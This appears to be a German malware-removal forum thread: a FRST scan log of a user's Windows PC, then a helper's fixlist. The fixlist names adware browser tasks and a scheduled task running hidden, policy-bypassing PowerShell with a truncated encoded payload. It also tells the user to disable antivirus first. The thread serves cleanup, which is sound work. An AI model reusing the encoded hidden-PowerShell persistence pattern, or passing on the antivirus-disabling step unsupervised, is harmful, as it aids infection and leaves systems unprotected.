Task: {A1AE644B-6680-4D57-99C4-1FE32BE13D5B} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {A65B8F6D-A713-47F9-BB7D-735498D1C450} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-29] (Google Inc.)
Task: {AE71EAE0-A9B0-45EB-AC26-7137D2C92B00} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {B1CD5B0C-693D-4B7C-8323-C9FD491903EE} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {BAAAEC1C-119B-4660-A593-B5D97C4B8E6F} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {BCE21238-B804-496C-973D-49332B4BC6AE} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {C4675849-A54C-4834-BC5A-7D6ABA4BBB54} - System32\Tasks\eAHPeNhIUJBrowserUpdateUA => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe
Task: {C5625BD7-9D7F-45B0-8F71-CA915B4E0814} - System32\Tasks\Microsoft\Windows Embedded\Embedded App Launcher Startup => C:\Windows\system32\embeddedapplauncher.exe [2015-07-10] (Microsoft Corporation)
Task: {C6EA2FDA-643C-4333-A577-9FC6BC26272E} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {CB480BD6-186E-467C-B81B-091E970277CF} - System32\Tasks\ffgogogoCheckTask => C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe
Task: {CB660142-85F0-4F75-BF5F-CB86DACA85E2} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {CB6A3A7A-6827-4E97-90B5-33E9ED0C759B} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {D128CD79-AA9A-4682-9905-F14DB406D448} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {DADEF66A-B64F-42F7-84E8-039E9C3B9E69} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {DC4BE421-18AF-4C9E-9FFF-D48C8C6478E4} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {E653ACD2-7CC0-4B7B-9D01-730295A1F3D8} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {E6589D93-3FA5-49AF-9B33-493ACA29767E} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {E7892EEF-4D43-4930-B9D0-5C8888186A36} - System32\Tasks\{812DDBC9-50E6-4521-ABD6-CA97EAF205AD} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.7.0.103&amp;LastError=-3
Task: {E95F50C4-F888-4E6C-BAC1-02665CC2F866} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-04-06] (Hewlett-Packard)
Task: {EE3BDAA5-ED46-440A-8650-A160485AA160} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-07-10 13:00 - 2015-07-10 13:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-07-29 23:03 - 2015-07-15 04:04 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 01329936 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-19 18:06 - 2015-08-11 11:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-08-01 20:56 - 2015-08-02 16:03 - 00076152 _____ () C:\WINDOWS\SysWOW64\PnkBstrA.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-04-19 12:34 - 2016-04-19 12:34 - 00959176 _____ () C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\amd64\ClientTelemetry.dll
2015-10-01 09:51 - 2015-09-17 07:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-12-10 13:38 - 2015-11-25 06:20 - 06569472 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-10 13:38 - 2015-11-25 06:17 - 00471040 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-10 13:38 - 2015-11-25 06:17 - 01808384 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-01 09:51 - 2015-09-17 07:43 - 02274816 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-04-19 13:12 - 2016-04-06 12:04 - 01675928 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libglesv2.dll
2016-04-19 13:12 - 2016-04-06 12:04 - 00086168 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libegl.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\WINDOWS\Temp:$DATA [16]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2009-06-10 23:00 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-2630849102-760198568-3561441068-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "StartCN"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKLM\...\StartupApproved\Run32: => "PlaysTV"
HKLM\...\StartupApproved\Run32: => "mbot_en_037050261"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\StartupFolder: => "Xfire2.bat"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "BingSvc"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "CCleaner Monitoring"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{EF9BA6B0-D956-4E04-A56D-B2D010471C6C}] => (Allow) A:\Steam\bin\steamwebhelper.exe
FirewallRules: [{8C66906E-1DAA-4F0B-88E4-E0163476C022}] => (Allow) A:\Steam\bin\steamwebhelper.exe
FirewallRules: [{B3BD4173-9D91-493E-9FA0-7BCAB414DBB8}] => (Allow) A:\Battle.net\Battle.net.exe
FirewallRules: [{04697792-0727-44EB-82BB-90E6B7E101BA}] => (Allow) A:\Battle.net\Battle.net.exe
FirewallRules: [{29D5CD28-05A0-4A40-8780-02DADE66DA50}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{3E4AF0F9-5D5F-47A5-89C3-8483E1874B3C}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{632E65A2-F35B-4491-A894-4259D389B688}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{DA65680E-6E44-4201-B745-F198AC8E3393}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [TCP Query User{52257645-0630-45E9-A1FB-39934F6C2678}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{4FE86D86-4126-4CAC-B0C6-0964BDDF3F14}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [{79EA3DA0-E438-4DF1-B00E-395F81892905}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{9074E1C2-24F4-4C85-931B-F7C36B46E9F0}] => (Allow) A:\Steam\Steam.exe
FirewallRules: [{88748628-27A1-4BE3-A512-B5BEDB3F0CBC}] => (Allow) A:\Steam\Steam.exe
FirewallRules: [{1064F6A1-CED6-4E5B-9557-D4C9CE2276C3}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4_x86.exe
FirewallRules: [{F2EF9A12-86E9-472C-A3D4-94A1F9A17C0A}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4_x86.exe
FirewallRules: [{EAA7D367-AABF-426D-BB3F-EF9A70667017}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4.exe
FirewallRules: [{98D524D2-5FAB-47A1-8D96-609F4621339A}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4.exe
FirewallRules: [{54390D52-B160-4427-922D-9E33F5445695}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5AAA1481-9998-4568-8A9B-D962D4EC35DF}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{AFF1319A-917A-4107-A1B8-16C203B38CE3}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{6E5BD0D9-0928-42F6-B0CC-6822D671F49E}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{4EF4C32F-BB8F-4765-B97F-A9006BD42435}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{6B0C9A6B-F6E7-4A35-9EB7-6D1B664D401A}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{D0D01B7E-5143-44D9-AC6A-CC67DA9DC212}] => (Allow) A:\Program Files (x86)\Origin Games\BFH\BFHWebHelper.exe
FirewallRules: [{F3E54CC2-1149-412B-936A-B7B404D80F42}] => (Allow) A:\Program Files (x86)\Origin Games\BFH\BFHWebHelper.exe
FirewallRules: [TCP Query User{7198F59F-7EF5-4103-881C-0D8F7DF8701B}A:\program files (x86)\origin games\bfh\bfh.exe] => (Allow) A:\program files (x86)\origin games\bfh\bfh.exe
FirewallRules: [UDP Query User{80C05AF5-C686-4759-B28B-9A8FEF736C4C}A:\program files (x86)\origin games\bfh\bfh.exe] => (Allow) A:\program files (x86)\origin games\bfh\bfh.exe
FirewallRules: [{277B4264-74AC-4424-97C4-6D6C0796EF8F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{29E298B7-7591-4640-AD04-9B5F1E53CBA1}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E35884C9-26D9-4EAD-9D40-2E56C22777E7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{085256D1-31AD-4037-8168-D364B01EBC13}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [TCP Query User{B4514ECE-E440-46E1-B1D2-26717681B1E0}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [UDP Query User{6A8D13A6-8290-4176-8559-5F33EC7ED562}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [TCP Query User{821D4B6B-A2AB-4689-9063-D6F980672A77}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{D00ED757-645B-41E0-BFF0-EFEEBB5995ED}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{823DAAEE-6ABF-4B05-BDB9-383B0D21FE83}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [UDP Query User{BB735679-47B3-409A-8738-29CA284AA409}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [TCP Query User{6EE9145F-17C0-43E7-87FF-67A36AF241E7}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{97AB465D-9EFC-47C7-BF64-913694D80FCA}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{19645894-3D5C-4408-A5F6-9B66DFB1DC9F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{AA0EA854-6DFB-4B81-8D5C-1056DC11E33C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{1FB21FF6-AB11-484B-8ADB-638F34153E99}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{48F1500B-0F5A-488B-A6C2-4E310ADB9290}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{2DB1B594-3330-4CBE-9C2C-A9AE295E4933}] => (Allow) C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\chrome.exe
FirewallRules: [{3C2F26B4-E13F-4E26-B187-60BDB19D986F}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{16CB5095-C60B-4A9A-AF40-FFF4FF667E4A}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{302047B4-E0E7-4AE6-96B2-BDD4D5C4307D}] => (Allow) A:\iTunes.exe
FirewallRules: [{4C2E216B-3F5D-4DC6-B3E5-D777C482C8FC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Wiederherstellungspunkte =========================

ACHTUNG: Systemwiederherstellung ist deaktiviert

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (04/16/2016 06:13:41 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: rdyboost4

Error: (04/16/2016 06:13:41 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll4

Error: (04/16/2016 10:01:24 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm SndVol.exe, Version 10.0.10240.16384 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 1b34

Startzeit: 01d197b0a249f565

Beendigungszeit: 2

Anwendungspfad: C:\Windows\System32\SndVol.exe

Berichts-ID: 676b8fbe-03a9-11e6-9c27-bcaec571bf31

Vollständiger Name des fehlerhaften Pakets:

Auf das fehlerhafte Paket bezogene Anwendungs-ID:

Error: (04/12/2016 03:18:06 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.

Error: (04/12/2016 03:18:06 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3472) Der Versuch, die Datei "C:\WINDOWS\system32\edbtmp.log" zu erstellen, ist mit Systemfehler 5 (0x00000005): "Zugriff verweigert " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Erstellen von Dateien.

Error: (04/12/2016 03:17:55 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.

Error: (04/12/2016 03:17:55 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3472) Der Versuch, die Datei "C:\WINDOWS\system32\edbtmp.log" zu erstellen, ist mit Systemfehler 5 (0x00000005): "Zugriff verweigert " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Erstellen von Dateien.

Error: (04/12/2016 03:17:45 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.

Error: (04/12/2016 03:17:45 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3472) Der Versuch, die Datei "C:\WINDOWS\system32\edbtmp.log" zu erstellen, ist mit Systemfehler 5 (0x00000005): "Zugriff verweigert " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Erstellen von Dateien.

Error: (04/12/2016 03:17:35 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.


Systemfehler:
=============
Error: (04/19/2016 04:19:13 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Xbox Live Authentifizierungs-Manager" wurde mit dem folgenden dienstspezifischen Fehler beendet:
%%0

Error: (04/19/2016 04:11:18 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenzugriff_Session1" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 04:11:18 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenspeicher _Session1" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 04:11:18 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Kontaktdaten_Session1" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 04:11:18 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_Session1" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 04:11:02 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Search" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 04:11:02 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "AVG PC TuneUp Service" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 250 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 04:11:02 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "PnkBstrA" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (04/19/2016 04:11:02 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "MPC Core Protect Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (04/19/2016 04:11:02 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "AVG Service" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 0 Millisekunden durchgeführt: Neustart des Diensts.


CodeIntegrity:
===================================
  Date: 2016-04-19 17:59:05.188
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:05.092
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:05.014
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.936
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.854
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.765
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.671
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.514
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.421
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.327
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i7-2600K CPU @ 3.40GHz
Prozentuale Nutzung des RAM: 22%
Installierter physikalischer RAM: 8173.24 MB
Verfügbarer physikalischer RAM: 6330.54 MB
Summe virtueller Speicher: 16877.24 MB
Verfügbarer virtueller Speicher: 14674.41 MB

==================== Laufwerke ================================

Drive a: (Harun) (Fixed) (Total:931.51 GB) (Free:774.43 GB) NTFS
Drive c: (Windows) (Fixed) (Total:59.09 GB) (Free:13.59 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 59.6 GB) (Disk ID: D9E74E88)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=59.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4D282A8D)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

cosinus 19.04.2016 19:14
FRST-Fix

Virenscanner jetzt bitte komplett deaktivieren, damit sichergestellt ist, dass der Fix sauber durchläuft!

Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
Task: {04C44956-D7CD-4939-8F45-2FF07606F6B9} - System32\Tasks\bvxvcxxvaf => C:\Users\Harun\AppData\Local\bvxvcxxvaf\bvxvcxxvaf.exe <==== ACHTUNG
Task: {113ED8FC-24C5-4F57-AF03-B5534E316C7D} - System32\Tasks\{0E0B0E47-0D04-0808-0E11-0D0B0479110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8A (Der Dateneintrag hat 9596 mehr Zeichen). <==== ACHTUNG
Task: {A0FF1C4C-B44D-432C-AFCB-8A38CAAB8ADC} - \Microsoft\Windows\File Classification Infrastructure\Property Definition Sync -> Keine Datei <==== ACHTUNG
C:\WINDOWS\System32\Tasks\ffgogogoCheckTask
C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateCore
C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateUA
C:\Users\Harun\AppData\Local\ffgogogo
C:\Users\Public\Documents\ffgogogo
C:\Users\Harun\AppData\Roaming\ffgogogo
C:\Program Files (x86)\eAHPeNhIUJ
C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateUA
C:\WINDOWS\System32\Tasks\eAHPeNhIUJCheckTask
